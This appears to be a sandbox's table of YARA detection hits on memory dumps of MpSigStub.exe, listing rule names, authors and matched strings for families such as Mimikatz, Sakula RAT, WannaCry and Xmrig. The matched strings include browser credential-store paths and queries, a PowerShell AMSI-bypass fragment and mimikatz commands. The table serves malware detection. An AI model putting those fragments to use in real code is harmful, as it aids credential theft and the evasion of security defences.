36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack	APT_DNSpionage_Karkoff_Malware_Apr19_1	Detects DNSpionage Karkoff malware	Florian Roth	0x8392:$x3: rimrun.com
36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack	DeepPanda_htran_exe	Hack Deep Panda - htran-exe	Florian Roth	0x8d0e:$s15: [+] OK! I Closed The Two Socket.
36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack	SUSP_DropperBackdoor_Keywords	Detects suspicious keywords that indicate a backdoor	Florian Roth	0x8371:$x4: DropperBackdoor
36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack	APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3	Detects HOPLIGHT malware used by HiddenCobra APT group	Florian Roth	0xab9d:$s5: emailAddress= 0xab8d:$s7: www.naver.com 0xab5c:$x2: reykfgkodfgkfdskgdfogpdokgsdfpg 0xab3e:$x3: fjiejffndxklfsdkfjsaadiepwn
36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a365984d.191.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a31af2c4.73.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
36.3.MpSigStub.exe.197a31af2c4.73.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a31af2c4.73.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
36.3.MpSigStub.exe.197a31af2c4.73.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a46aeebe.25.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0x2283a:$: Decrypt.txt
36.3.MpSigStub.exe.197a46aeebe.25.unpack	malware_sakula_xorloop	XOR loops from Sakula malware	David Cannings	0x0:$mz: MZ 0x740cc:$opcodes_decode_loop01: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
36.3.MpSigStub.exe.197a46aeebe.25.unpack	HackTool_Samples	Hacktool	unknown	0x2cbe0:$i: WPE-C1467211-7C89-49c5-801A-1D048E4014C4
36.3.MpSigStub.exe.197a46aeebe.25.unpack	RAT_Sakula	Detects Sakula v1.0 RAT	Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings	0x740cc:$opcodes2: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
36.3.MpSigStub.exe.197a46aeebe.25.unpack	HackTool_MSIL_SharpHound_3	The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project.	FireEye	0x74a3c:$typelibguid1: a517a8de-5834-411d-abda-2d0e1766539c
36.3.MpSigStub.exe.197a46aeebe.25.unpack	HKTL_NET_GUID_SharpHound3	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x74a3c:$typelibguid0: a517a8de-5834-411d-abda-2d0e1766539c
36.3.MpSigStub.exe.197a46aeebe.25.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x3061e:$e6: exe.dmc 0x5a640:$r2: nuR\noisreVtnerruC
36.3.MpSigStub.exe.197a46aeebe.25.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a46aeebe.25.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
36.3.MpSigStub.exe.197a46aeebe.25.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
36.3.MpSigStub.exe.197a46aeebe.25.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
36.3.MpSigStub.exe.197a46aeebe.25.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
36.3.MpSigStub.exe.197a46aeebe.25.unpack	MirageStrings	Mirage Identifying Strings	Seth Hardy	0x2d8cd:$: Neo,welcome to the desert of real.
36.3.MpSigStub.exe.197a37e91da.72.raw.unpack	clearlog	Detects Fireball malware - file clearlog.dll	Florian Roth	0x286bd:$s3: hhhhh.exe 0x286a7:$s4: ttttt.exe 0x28691:$s6: cle.log.1
36.3.MpSigStub.exe.197a4673aed.13.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0x5dc0b:$: Decrypt.txt
36.3.MpSigStub.exe.197a4673aed.13.unpack	malware_sakula_xorloop	XOR loops from Sakula malware	David Cannings	0x0:$mz: MZ 0xaf49d:$opcodes_decode_loop01: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
36.3.MpSigStub.exe.197a4673aed.13.unpack	HackTool_Samples	Hacktool	unknown	0x67fb1:$i: WPE-C1467211-7C89-49c5-801A-1D048E4014C4
36.3.MpSigStub.exe.197a4673aed.13.unpack	RAT_Sakula	Detects Sakula v1.0 RAT	Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings	0xaf49d:$opcodes2: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
36.3.MpSigStub.exe.197a4673aed.13.unpack	HackTool_MSIL_SharpHound_3	The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project.	FireEye	0xafe0d:$typelibguid1: a517a8de-5834-411d-abda-2d0e1766539c
36.3.MpSigStub.exe.197a4673aed.13.unpack	HKTL_NET_GUID_SharpHound3	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0xafe0d:$typelibguid0: a517a8de-5834-411d-abda-2d0e1766539c
36.3.MpSigStub.exe.197a4673aed.13.unpack	CredentialStealer_Generic_Backdoor	Detects credential stealer byed on many strings that indicate password store access	Florian Roth	0x13797:$s4: select * from moz_logins 0x13956:$s4: select * from moz_logins 0x13bfb:$s4: select * from moz_logins 0x13b9e:$s5: %s\Google\Chrome\User Data\Default\Login Data 0x13bcf:$s9: %s\Chromium\User Data\Default\Login Data 0x13c63:$s10: %s\Opera\Opera\profile\wand.dat
36.3.MpSigStub.exe.197a4673aed.13.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x6b9ef:$e6: exe.dmc 0x3b730:$r2: nuR\noisreVtnerruC 0x95a11:$r2: nuR\noisreVtnerruC
36.3.MpSigStub.exe.197a4673aed.13.unpack	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
36.3.MpSigStub.exe.197a4673aed.13.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a4673aed.13.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
36.3.MpSigStub.exe.197a4673aed.13.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
36.3.MpSigStub.exe.197a4673aed.13.unpack	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
36.3.MpSigStub.exe.197a4673aed.13.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
36.3.MpSigStub.exe.197a4673aed.13.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
36.3.MpSigStub.exe.197a4673aed.13.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
36.3.MpSigStub.exe.197a4673aed.13.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
36.3.MpSigStub.exe.197a4673aed.13.unpack	MirageStrings	Mirage Identifying Strings	Seth Hardy	0x68c9e:$: Neo,welcome to the desert of real.
36.3.MpSigStub.exe.197a4fa658a.115.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x7322:$: odhyrfjcnfkdtslt
36.3.MpSigStub.exe.197a4fa658a.115.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0x6d4a:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
36.3.MpSigStub.exe.197a46f017a.26.raw.unpack	MiniRAT_Gen_1	Detects Mini RAT malware	Florian Roth	0x29579:$x1: \Mini rat\
36.3.MpSigStub.exe.197a46f017a.26.raw.unpack	SUSP_PDB_Strings_Keylogger_Backdoor	Detects PDB strings used in backdoors or keyloggers	Florian Roth	0x287fc:$: \Debug\KeyLogger
36.3.MpSigStub.exe.197a464526e.104.raw.unpack	APT_DNSpionage_Karkoff_Malware_Apr19_1	Detects DNSpionage Karkoff malware	Florian Roth	0x7b8e:$x3: rimrun.com
36.3.MpSigStub.exe.197a464526e.104.raw.unpack	DeepPanda_htran_exe	Hack Deep Panda - htran-exe	Florian Roth	0x850a:$s15: [+] OK! I Closed The Two Socket.
36.3.MpSigStub.exe.197a464526e.104.raw.unpack	SUSP_DropperBackdoor_Keywords	Detects suspicious keywords that indicate a backdoor	Florian Roth	0x7b6d:$x4: DropperBackdoor
36.3.MpSigStub.exe.197a464526e.104.raw.unpack	APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3	Detects HOPLIGHT malware used by HiddenCobra APT group	Florian Roth	0xa399:$s5: emailAddress= 0xa389:$s7: www.naver.com 0xa358:$x2: reykfgkodfgkfdskgdfogpdokgsdfpg 0xa33a:$x3: fjiejffndxklfsdkfjsaadiepwn
36.3.MpSigStub.exe.197a464526e.104.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a365bea1.190.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a4dc6bfe.87.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xf51e:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a4dc6bfe.87.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a4dc6bfe.87.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a424480d.93.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x10a66:$x1: ReflectiveLoader
36.3.MpSigStub.exe.197a424480d.93.raw.unpack	HackTool_Samples	Hacktool	unknown	0x24395:$c: Failed to load SAM functions
36.3.MpSigStub.exe.197a424480d.93.raw.unpack	PS_AMSI_Bypass	Detects PowerShell AMSI Bypass	Florian Roth	0xe96b:$s1: .getfield('amsicontext',[reflection.bindingflags]'nonpublic,static').
36.3.MpSigStub.exe.197a424480d.93.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a434950c.82.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x3a11:$x4: Http/1.1 403 Forbidden 0x3a11:$s5: Http/1.1 403 Forbidden
36.3.MpSigStub.exe.197a434950c.82.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x41d9:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a434950c.82.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a48adbfa.121.unpack	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x3820:$opbs73: eval(str_rot13( 0x23b0:$php_short: <? 0x348f:$php_short: <? 0x23b0:$php_new1: <?=$ 0x348f:$php_new2: <?php
36.3.MpSigStub.exe.197a48adbfa.121.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a407fe9d.125.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xf5fb:$s1: stratum+tcp:// 0x10217:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a407fe9d.125.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x1d343:$e3: exe.rerolpxe
36.3.MpSigStub.exe.197a407fe9d.125.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
36.3.MpSigStub.exe.197a4fa798e.114.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x5f1e:$: odhyrfjcnfkdtslt
36.3.MpSigStub.exe.197a4fa798e.114.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0x5946:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
36.3.MpSigStub.exe.197a3f2f03e.60.raw.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x2924a:$s1: sekurlsa::msv 0x292cc:$s7: sekurlsa::ssp 0x2928b:$s11: sekurlsa::pth
36.3.MpSigStub.exe.197a37e9bde.71.raw.unpack	clearlog	Detects Fireball malware - file clearlog.dll	Florian Roth	0x27cb9:$s3: hhhhh.exe 0x27ca3:$s4: ttttt.exe 0x27c8d:$s6: cle.log.1
36.3.MpSigStub.exe.197a3e184e5.98.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x2b41:$x1: ReflectiveLoader
36.3.MpSigStub.exe.197a3e184e5.98.raw.unpack	HackTool_MSIL_SharPersist_2	unknown	FireEye	0xcdc5:$a1: SharPersist.lib 0xcdd9:$a2: SharPersist.exe 0xcded:$b1: ERROR: Invalid hotkey location option given. 0xce1e:$b2: ERROR: Invalid hotkey given. 0xce3f:$b3: ERROR: Keepass configuration file not found. 0xce70:$b4: ERROR: Keepass configuration file was not found. 0xcea5:$b5: ERROR: That value already exists in: 0xcece:$b6: ERROR: Failed to delete hidden registry key. 0xceff:$pdb1: \SharPersist\ 0xcf11:$pdb2: \SharPersist.pdb
36.3.MpSigStub.exe.197a3f84db6.95.unpack	hacktool_macos_keylogger_logkext	LogKext is an open source keylogger for Mac OS X, a product of FSB software.	@mimeframe	0x1ff49:$a1: logKextPassKey 0xb31f0:$a1: logKextPassKey 0x1e0ec:$a4: com_fsb_iokit_logKext 0x1ff6c:$a4: com_fsb_iokit_logKext 0x79480:$a4: com_fsb_iokit_logKext 0xb321e:$b1: logKext Password: 0xb3233:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0x1ff49:$c1: logKextPassKey 0xb31f0:$c1: logKextPassKey
36.3.MpSigStub.exe.197a3f84db6.95.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0xc6971:$x11: \\.\mimidrv
36.3.MpSigStub.exe.197a3f84db6.95.unpack	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x54d97:$sa1: -ENC 0xfd2cf:$sc2: -noprofile 0xfd2e1:$sd2: -noninteractive 0x53819:$se1: -EP bypass 0x54d7f:$se3: -ExecutionPolicy BypasS
36.3.MpSigStub.exe.197a3f84db6.95.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a3f84db6.95.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a3d9206c.229.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x1906e:$x4: Http/1.1 403 Forbidden 0x1906e:$s5: Http/1.1 403 Forbidden
36.3.MpSigStub.exe.197a3d9206c.229.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0xac3d:$e3: exe.rerolpxe 0x3f5fe:$e6: exe.dmc 0x1b729:$r2: nuR\noisreVtnerruC
36.3.MpSigStub.exe.197a357b147.154.unpack	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0xd5468:$a: Cookies: Sym1.0 0xd5409:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
36.3.MpSigStub.exe.197a357b147.154.unpack	APT_Backdoor_Win_DShell_3	This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell	FireEye	0xd50d5:$dlang1: C:\D\dmd2\windows\bin\..\..\src\phobos\std\utf.d 0xd510a:$dlang2: C:\D\dmd2\windows\bin\..\..\src\phobos\std\file.d 0xd5140:$dlang3: C:\D\dmd2\windows\bin\..\..\src\phobos\std\format.d 0xd5178:$dlang4: C:\D\dmd2\windows\bin\..\..\src\phobos\std\base64.d 0xd51b0:$dlang5: C:\D\dmd2\windows\bin\..\..\src\phobos\std\stdio.d 0xd50ea:$dlang6: \..\..\src\phobos\std\utf.d 0xd51e7:$dlang6: \..\..\src\phobos\std\utf.d 0xd511f:$dlang7: \..\..\src\phobos\std\file.d 0xd5207:$dlang7: \..\..\src\phobos\std\file.d 0xd5155:$dlang8: \..\..\src\phobos\std\format.d 0xd5228:$dlang8: \..\..\src\phobos\std\format.d 0xd518d:$dlang9: \..\..\src\phobos\std\base64.d 0xd524b:$dlang9: \..\..\src\phobos\std\base64.d 0xd51c5:$dlang10: \..\..\src\phobos\std\stdio.d 0xd526e:$dlang10: \..\..\src\phobos\std\stdio.d 0xd5290:$dlang11: Unexpected '\n' when converting from type const(char)[] to type int 0x1928e:$e0: ,0, 0xd52d8:$e0: ,0, 0xd52da:$e1: ,1, 0xd52dc:$e2: ,2, 0xd52de:$e3: ,3,
36.3.MpSigStub.exe.197a357b147.154.unpack	SUSP_Microsoft_7z_SFX_Combo	Detects a suspicious file that has a Microsoft copyright and is a 7z SFX	Florian Roth	0x3575b:$s1: 7ZSfx%03x.cmd 0x1f080:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x1fcc8:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x20874:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x21464:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x22074:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xa65f4:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xcfce3:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xd2117:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xddc6b:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xe02e3:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ...
36.3.MpSigStub.exe.197a357b147.154.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a36a8ae6.146.unpack	IMPLANT_4_v5	BlackEnergy / Voodoo Bear Implant by APT28	US CERT	0x577b3:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1
36.3.MpSigStub.exe.197a36a8ae6.146.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
36.3.MpSigStub.exe.197a36a8ae6.146.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
36.3.MpSigStub.exe.197a31af2c4.167.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
36.3.MpSigStub.exe.197a31af2c4.167.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a31af2c4.167.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
36.3.MpSigStub.exe.197a31af2c4.167.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a31aed77.165.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
36.3.MpSigStub.exe.197a31aed77.165.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a31aed77.165.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
36.3.MpSigStub.exe.197a31aed77.165.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a31ae82a.166.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
36.3.MpSigStub.exe.197a31ae82a.166.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a31ae82a.166.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
36.3.MpSigStub.exe.197a31ae82a.166.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a31aed77.74.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
36.3.MpSigStub.exe.197a31aed77.74.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a31aed77.74.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
36.3.MpSigStub.exe.197a31aed77.74.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a31ae82a.75.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
36.3.MpSigStub.exe.197a31ae82a.75.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a31ae82a.75.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
36.3.MpSigStub.exe.197a31ae82a.75.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a46aeebe.14.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0x2283a:$: Decrypt.txt
36.3.MpSigStub.exe.197a46aeebe.14.unpack	malware_sakula_xorloop	XOR loops from Sakula malware	David Cannings	0x0:$mz: MZ 0x740cc:$opcodes_decode_loop01: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
36.3.MpSigStub.exe.197a46aeebe.14.unpack	HackTool_Samples	Hacktool	unknown	0x2cbe0:$i: WPE-C1467211-7C89-49c5-801A-1D048E4014C4
36.3.MpSigStub.exe.197a46aeebe.14.unpack	RAT_Sakula	Detects Sakula v1.0 RAT	Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings	0x740cc:$opcodes2: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
36.3.MpSigStub.exe.197a46aeebe.14.unpack	HackTool_MSIL_SharpHound_3	The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project.	FireEye	0x74a3c:$typelibguid1: a517a8de-5834-411d-abda-2d0e1766539c
36.3.MpSigStub.exe.197a46aeebe.14.unpack	HKTL_NET_GUID_SharpHound3	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x74a3c:$typelibguid0: a517a8de-5834-411d-abda-2d0e1766539c
36.3.MpSigStub.exe.197a46aeebe.14.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x3061e:$e6: exe.dmc 0x5a640:$r2: nuR\noisreVtnerruC
36.3.MpSigStub.exe.197a46aeebe.14.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a46aeebe.14.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
36.3.MpSigStub.exe.197a46aeebe.14.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
36.3.MpSigStub.exe.197a46aeebe.14.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
36.3.MpSigStub.exe.197a46aeebe.14.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
36.3.MpSigStub.exe.197a46aeebe.14.unpack	MirageStrings	Mirage Identifying Strings	Seth Hardy	0x2d8cd:$: Neo,welcome to the desert of real.
36.3.MpSigStub.exe.197a3f84db6.208.unpack	hacktool_macos_keylogger_logkext	LogKext is an open source keylogger for Mac OS X, a product of FSB software.	@mimeframe	0x1ff49:$a1: logKextPassKey 0xb31f0:$a1: logKextPassKey 0x1e0ec:$a4: com_fsb_iokit_logKext 0x1ff6c:$a4: com_fsb_iokit_logKext 0x79480:$a4: com_fsb_iokit_logKext 0xb321e:$b1: logKext Password: 0xb3233:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0x1ff49:$c1: logKextPassKey 0xb31f0:$c1: logKextPassKey
36.3.MpSigStub.exe.197a3f84db6.208.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0xc6971:$x11: \\.\mimidrv
36.3.MpSigStub.exe.197a3f84db6.208.unpack	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x54d97:$sa1: -ENC 0xfd2cf:$sc2: -noprofile 0xfd2e1:$sd2: -noninteractive 0x53819:$se1: -EP bypass 0x54d7f:$se3: -ExecutionPolicy BypasS
36.3.MpSigStub.exe.197a3f84db6.208.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a3f84db6.208.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a3578ac5.153.unpack	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0xd7aea:$a: Cookies: Sym1.0 0xd7a8b:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
